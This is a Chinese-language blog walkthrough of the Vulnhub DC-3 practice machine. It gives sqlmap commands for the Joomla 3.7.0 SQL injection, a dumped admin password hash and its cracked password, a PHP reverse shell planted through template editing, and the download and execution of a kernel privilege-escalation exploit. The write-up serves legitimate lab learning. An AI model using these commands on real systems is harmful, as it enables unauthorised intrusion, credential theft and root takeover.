Vulnhub DC-3靶机渗透测试(DC系列)

最新推荐文章于 2024-06-04 22:11:38 发布
最新推荐文章于 2024-06-04 22:11:38 发布
阅读量925 收藏 2
点赞数
分类专栏: Vulnhub靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43669045/article/details/108740504
版权

每日学习~ 冲冲冲

VulnHub 入门DC系列之DC-3

说明

靶场下载地址:https://www.vulnhub.com/entry/dc-32,312/
渗透靶场:VirtualBox
攻击靶机:本地机+kail(VMware)
Flag:1个(只存在于 /root根目录下)

启动DC-3靶机,界面显示登录界面,这是正常运行情况,我们也并没有登录账号,需要自己去渗透测试进行提权。回到我们的攻击机

文章目录

扫描内网 发现主机

(1)扫描内网,发现目标主机IP

使用命令:arp-scan -l 发现内网中的主机

在这里插入图片描述

扫描主机

(2)利用nmap对目标主机进行端口扫描,发现开放端口

使用命令:nmap -sV -p- 192.168.43.119

在这里插入图片描述
发现开放80端口,则可以进行网页访问。

信息收集

访问主页,提示该靶场只有一个flag,且获得的前提是root权限。

在这里插入图片描述

利用插件Wappalyzer可以发现这是利用Joomal框架搭建的web网站

使用Joomscan工具扫描网站 获得到当前Joomal框架版本和后台登录链接

扫描器,扫描使用Joommal框架的网站,检测Joomal版本、可访问的危险路径、后台登录界面、已知漏洞、防火墙等。

在这里插入图片描述



使用searchsploit工具查找Joomla 3.7.0 版本存在的漏洞,发现一个sql注入漏洞

searchsploit Joomla 3.7.0

在这里插入图片描述
提取出sql注入漏洞相关介绍文档保存到本地,查看其漏洞利用

在这里插入图片描述

发现并利用漏洞

使用sqlmap自动注入工具对靶机执行sql注入代码

注入查询数据库有哪些,查出5个数据库信息

sqlmap -u "http://192.168.43.119/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

在这里插入图片描述

查询当前使用的数据库:Joomladb

sqlmap -u "http://192.168.43.119/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]

查询当前使用数据库的表:筛选出用户表:#__users

sqlmap -u "http://192.168.43.119/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables  -p list[fullordering]

在这里插入图片描述

对#_users 表进行爆破

获取列名
sqlmap -u "http://192.168.220.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns  -p list[fullordering]

获取字段记录
sqlmap  -u "http://192.168.43.119/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump  -p list[fullordering]

在这里插入图片描述

获得网站后台的用户名以及密码hash值

admin  #用户名
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu  #密码hash值

将其hash值存储为txt文件后,使用工具john 进行hash爆破

在这里插入图片描述
登录用户名:admin 密码:snoopy

进入功能模块

在这里插入图片描述
点击Bezz可以看到大量文件

自己新建一个PHP文件
在这里插入图片描述
访问 192.168.43.119/templatesbeez3/test.php 执行了php代码

在这里插入图片描述

反弹shell 获取flag

写入反弹shell脚本
在这里插入图片描述

打开端口监听 nc -lvvp 7777

访问地址 192.168.43.119/templatesbeez3/test.php

反弹shell

在这里插入图片描述

内核提权漏洞

查看kernel版本:uname -a
查看linux版本:/etc/*-release

在这里插入图片描述

使用searchsploit搜索可利用的exp脚本

在这里插入图片描述
exp具体利用方式可见:https://www.exploit-db.com/exploits/39772

靶机获取exp脚本文件

先将exp下载到kali镜像(攻击机)中

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

将下载的压缩包放到/var/www/html/文件夹下并开启http服务

python -m SimpleHTTPServer 8000

在反弹shell的情况下(攻击者连接上了靶机)输入命令将exp下载到靶机环境中

wget http://192.168.67.134:9000/39772.zip

exp利用

解压该文件

unzip 39772.zip

再解压刚刚解压出来的文件

cd 39772
tar –xvf exploit.tar

进入39772/ebpf_mapfd_doubleput_exploit 目录,运行编译文件 compile.sh

cd ebpf_mapfd_doubleput_exploit
./compile.sh

获得最终提权脚本文件doubleput

执行doubleput 文件提权成功

./doubleput

该脚本会在60秒内反弹一个root权限的shell

这时进入/root目录,可以成功获得flag

在这里插入图片描述

总计

1、Linux内核漏洞提权
2、Joomscan可针对Joomal框架进行扫描
2、使用kali自带exploitdb库可查询exp,命令为Searchsploit 程序名称 版本
3、使用John对hash值解密
4、bash反弹shell

Alexhirchi
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub系列靶机--DC3
cyzCc的博客
02-23 468
vulnhub系列靶机DC3 主机发现: 先主机发现找到靶机的ip 使用nmap nmap -sP 192.168.211.0/24 netdiscover -r 192.168.211.1/24 根据MAC地址可以确定靶机的ip为192.168.211.136 然后扫描该ip所开放的端口服务 nmap -A 192.168.211.136 -p 1-65535 发现靶机只开放了80端口,访...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试——DC-3
Cobra的博客
04-26 3402
一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu16.04): 192.168.189.182 靶机下载地址:DC: 3.2 ~ VulnHub 二、信息收集 1、使用nmap扫描存活主机 2、发现IP192.168.189.182开放80端口,再对其进行nmap扫描 nmap -sV -A -T4 192.168.189.182 3、通过扫描结果我们发现其指纹信息为joomla,访问其80端口 4、使用dirsearch对其进行目.
vulnhub靶机实战DC-3
最新发布
Varin
06-04 945
vulnhub靶机实战DC-3
Vulnhub靶机 DC-3
菜浪马废的博客
03-20 401
扫描ip 找到靶机192.168.0.131 发现开放80端口 必须访问一下啊 这个样子的,没啥信息 上插件 wappalyzer 火狐的指纹信息插件 nmap也扫了一下 实锤了,Joomla的cms 那肯定要用配套的joomscan扫一下啊 没事就扫一扫,扫扫更健康 没安装,先装一下 apt-get install joomscan 安装命令 看见版本号了,3.7.0,还有后台...
VulnHub DC3
baynk的博客
05-16 286
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-32,312/ 下载地址2 dc-3.2:https://pan.baidu.com/s/1LyKZbgQiQsSqpMlY8kNUBw 提取码: z4pv 下载地址3 dc-3:https://pan.baidu.com/s/1lt3ek4ra2jHbR4HVEyrk7g 提取码: j8cg 只有一个flag了,同时也只有一个切入点,而且官网上DC3好像升到了DC3-2,不知道到和以前的区别大不大,我这里就
Vulnhub DC-3
柠檬木有枝
07-14 1141
访问服务,发现是 joomla 服务,使用 joomlacan 扫描 joomlascan -u 192.168.6.129 3.7.0 版本,存在 SQl 注入漏洞(CVE-2017-8917) github 下载 exp 然后运行,获取到用户名密码 hash 使用 hashcat 破解 hash,破解密码得 snoopy 登录到后台 发现提示,需要获取到 root 权限 编辑模版,修改...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
VulnHubDC-3
qq_45434762的博客
03-23 482
一个粗糙的信息收集通过扫描端口信息,我们看到服务器只开放了一个80端口,运行的是Joomla框架我们打开网站看看在首页提示我们,这个靶机只有一个Flag,并且没有任何线索使用dirb扫...
vulnhub-DC3
weixin_55129870的博客
05-15 493
开机出现错误,解决方法。趁着更改网络连接方式为nat模式。 开启kali.探测主机存活 nmap -sP 192.168.44.0/24 DC3IP: 192.168.44.143 扫描主机开放服务 nmap -A 192.168.44.143 -p 1-65535 只开放80端口,直接浏览器访问 指纹识别 whatweb http://192.168.44.143/ 结果显示使用apache平台,...
[Vulnhub] DC-3
weixin_63231007的博客
01-28 470
DC系列靶机-第三弹(JoomlaCMS漏洞+sqlmap+系统漏洞提权)
vulnhubdc3
qq_54030686的博客
06-08 271
各位师傅可直接移步至 查看此篇即可,本人只当做笔记,以理清逻辑关系 主机发现 nmap -sS 192.168.2.0/24 发现测试靶机的ip为192.168.2.107,进行端口扫描 发现仅80端口开放进行指纹识别 发现网站使用的框架为joomla,使用专属的joomlascan进行检测, (中途更改了下环境,现在目标为192.168.43.131,本机ip为192.168.4.128) 打开相应界面 使用joomlascan进行检测 并未检测到相关漏洞,但检测到了后台路径和joomla 3.7版本,谷
DC3靶机
PigLL的博客
08-11 443
## 关于DC3 靶机实验 1.信息收集: 2.网站信息 在浏览器中访问DC3的IP 利用工具kali中的nikto做一个简单的信息识别 通过扫描可以看到一些目录 然后通过浏览器可以访问 然后利用joomla专用的扫描工具joomscan扫描 发现了joomla的版本和一些目录 通过kali中的工具searchsploit扫描joomla 3.7.0版本存在的漏洞 通过扫描发现了一个42033.txt文件 通过searchsploit 将42033文件下载到当前目录 查看42033文件 发现
vulnhub DC系列 DC-3
m0_64815693的博客
12-29 1845
vulnhub DC系列 DC-3
vulnhub靶场之DC-3
qq_58091216的博客
01-08 1278
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值